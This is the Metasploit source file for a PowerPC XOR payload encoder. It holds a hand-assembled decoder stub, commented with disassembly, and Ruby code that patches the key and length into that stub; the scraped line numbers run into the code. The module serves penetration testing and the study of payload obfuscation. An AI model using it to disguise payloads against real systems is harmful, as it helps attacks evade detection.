Path: blob/master/modules/encoders/ppc/longxor.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder::Xor67def initialize8super(9'Name' => 'PPC LongXOR Encoder',10'Description' => %q{11This encoder is ghandi's PPC dword xor encoder with some size tweaks12by HDM.13},14'Author' => [ 'ddz', 'hdm' ],15'Arch' => ARCH_PPC,16'License' => MSF_LICENSE,17'Decoder' => {18'KeySize' => 4,19'BlockSize' => 4,20'KeyPack' => 'N'21})22end2324#25# Returns the decoder stub that is adjusted for the size of26# the buffer being encoded27#28def decoder_stub(_state)29[300x7ca52a79, # 0x1da8 <main>: xor. r5,r5,r5310x4082fffd, # 0x1dac <main+4>: bnel+ 0x1da8 <main>320x7fe802a6, # 0x1db0 <main+8>: mflr r31330x3bff07fa, # 0x1db4 <main+12>: addi r31,r31,2042340x38a5f84a, # 0x1db8 <main+16>: addi r5,r5,-1974350x3cc09999, # 0x1dbc <main+20>: lis r6, hi16(key)360x60c69999, # 0x1dc0 <main+24>: ori r6,r6, lo16(key)370x388507ba, # 0x1dc4 <main+28>: addi r4,r5,1978380x7c8903a6, # 0x1dc8 <main+32>: mtctr r4390x809ff84a, # 0x1dcc <main+36>: lwz r4,-1974(r31)400x7c843278, # 0x1dd0 <main+40>: xor r4,r4,r6410x909ff84a, # 0x1dd4 <main+44>: stw r4,-1974(r31)420x7c05f8ac, # 0x1dd8 <main+48>: dcbf r5,r31430x7cff04ac, # 0x1ddc <main+52>: sync440x7c05ffac, # 0x1de0 <main+56>: icbi r5,r31450x3bc507ba, # 0x1de4 <main+60>: addi r30,r5,1978460x7ffff215, # 0x1de8 <main+64>: add. r31,r31,r30470x4220ffe0, # 0x1dec <main+68>: bdnz- 0x1dcc <main+36>480x4cff012c, # 0x1df0 <main+72>: isync49].pack('N*')50end5152#53# Fix up the decoder stub now54#55def encode_finalize_stub(state, stub)56icount = state.buf.length / 45758stub[30, 2] = [ 1974 + icount ].pack('n')59stub[22, 2] = [ state.key.to_i ].pack('N')[0, 2]60stub[26, 2] = [ state.key.to_i ].pack('N')[2, 2]6162stub63end64end656667